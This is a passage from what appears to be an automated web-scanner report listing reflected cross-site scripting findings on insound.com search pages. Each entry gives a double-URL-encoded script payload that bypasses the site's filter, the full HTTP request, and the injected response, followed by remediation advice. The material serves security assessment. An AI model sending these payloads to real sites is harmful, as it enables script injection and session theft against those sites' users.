   <link re
...[SNIP]...
<title>Lunice39604</title><script>alert(1)</script>4583cdc3959</title>
...[SNIP]...

1.179. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lyrics%20Born&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b776bb7d33 was submitted in the REST URL parameter 3. This input was echoed as 855f5"><script>alert(1)</script>2b776bb7d33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lyrics%20Born855f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b776bb7d33&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b77vhs2umg6hsqpq0kl6gnts31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=97711233; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=75584412; expires=Sun, 09-Jan-2011 02:41:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Lyrics Born855f5"><script>alert(1)</script>2b776bb7d33" />
...[SNIP]...

1.180. http://www.insound.com/search/query/Lyrics%20Born&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lyrics%20Born&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 42357%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b98dfeecda was submitted in the REST URL parameter 3. This input was echoed as 42357</title><script>alert(1)</script>9b98dfeecda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lyrics%20Born42357%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9b98dfeecda&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=607gdmfmt72ja0apv0iuf82n42; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470110010; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=443254738; expires=Sun, 09-Jan-2011 02:41:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Lyrics Born42357</title><script>alert(1)</script>9b98dfeecda</title>
...[SNIP]...

1.181. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Mark%20McGuire&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26ee08b833f was submitted in the REST URL parameter 3. This input was echoed as b87ae"><script>alert(1)</script>26ee08b833f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mark%20McGuireb87ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26ee08b833f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uu1g7th68g9a390q7hjs7t01i3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=417414704; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=122527464; expires=Sun, 09-Jan-2011 02:41:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Mark McGuireb87ae"><script>alert(1)</script>26ee08b833f" />
...[SNIP]...

1.182. http://www.insound.com/search/query/Mark%20McGuire&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Mark%20McGuire&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 898ca%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e187d020e590 was submitted in the REST URL parameter 3. This input was echoed as 898ca</title><script>alert(1)</script>187d020e590 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mark%20McGuire898ca%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e187d020e590&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0tkup712c1uaa5mjs5p932kr34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=241165276; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=470666164; expires=Sun, 09-Jan-2011 02:41:15 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Mark McGuire898ca</title><script>alert(1)</script>187d020e590</title>
...[SNIP]...

1.183. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matt%20Shadetek&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec86%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60db9deca47 was submitted in the REST URL parameter 3. This input was echoed as aec86"><script>alert(1)</script>60db9deca47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matt%20Shadetekaec86%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60db9deca47&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=djo33jq5k05hm7pnl6a66krep7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=81199055; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=184874954; expires=Sun, 09-Jan-2011 02:37:30 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Matt Shadetekaec86"><script>alert(1)</script>60db9deca47" />
...[SNIP]...

1.184. http://www.insound.com/search/query/Matt%20Shadetek&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matt%20Shadetek&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c7a94%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e23fd8638a9f was submitted in the REST URL parameter 3. This input was echoed as c7a94</title><script>alert(1)</script>23fd8638a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matt%20Shadetekc7a94%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e23fd8638a9f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c1arlsctp978mik574c7jhk021; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=478513417; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=44973102; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Matt Shadetekc7a94</title><script>alert(1)</script>23fd8638a9f</title>
...[SNIP]...

1.185. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matthew%20Dear&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f1c90%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64fd3d3b3bd was submitted in the REST URL parameter 3. This input was echoed as f1c90</title><script>alert(1)</script>64fd3d3b3bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matthew%20Dearf1c90%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64fd3d3b3bd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=jvvca1ce13d8aj392sba5vral6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=48964392; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=307515476; expires=Sun, 09-Jan-2011 02:37:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Matthew Dearf1c90</title><script>alert(1)</script>64fd3d3b3bd</title>
...[SNIP]...

1.186. http://www.insound.com/search/query/Matthew%20Dear&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Matthew%20Dear&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3baae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3d5b90c1f6 was submitted in the REST URL parameter 3. This input was echoed as 3baae"><script>alert(1)</script>d3d5b90c1f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Matthew%20Dear3baae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed3d5b90c1f6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0sqr4b9rn44vnl1chi0sif6hq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462756101; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=559530323; expires=Sun, 09-Jan-2011 02:37:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Matthew Dear3baae"><script>alert(1)</script>d3d5b90c1f6" />
...[SNIP]...

1.187. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Miko&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e82a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd299282faf was submitted in the REST URL parameter 3. This input was echoed as 7e82a"><script>alert(1)</script>dd299282faf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Miko7e82a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd299282faf&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bt3ttfv2coiml2c0n4u9h46be5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=187793335; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=384185930; expires=Sun, 09-Jan-2011 02:40:26 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Miko7e82a"><script>alert(1)</script>dd299282faf" />
...[SNIP]...

1.188. http://www.insound.com/search/query/Miko&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Miko&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload db927%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b8896b0659 was submitted in the REST URL parameter 3. This input was echoed as db927</title><script>alert(1)</script>3b8896b0659 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Mikodb927%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b8896b0659&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=a1d5qpig8ntuok0t6vubla5ql6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=35780573; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=33707272; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Mikodb927</title><script>alert(1)</script>3b8896b0659</title>
...[SNIP]...

1.189. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Query&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b355c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c16d003cfc was submitted in the REST URL parameter 3. This input was echoed as b355c</title><script>alert(1)</script>1c16d003cfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Queryb355c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c16d003cfc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1ldc0n0hpf7ecp6b3an3i9sje3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=72025940; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=495952899; expires=Sun, 09-Jan-2011 02:38:22 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nate Queryb355c</title><script>alert(1)</script>1c16d003cfc</title>
...[SNIP]...

1.190. http://www.insound.com/search/query/Nate%20Query&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nate%20Query&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb97fde7aa was submitted in the REST URL parameter 3. This input was echoed as 7fd84"><script>alert(1)</script>8cb97fde7aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nate%20Query7fd84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb97fde7aa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=c8hjo7pd71u007avgvkqih72e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=567353594; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=74335064; expires=Sun, 09-Jan-2011 02:38:16 GMT; path=/; domain=.insound.com
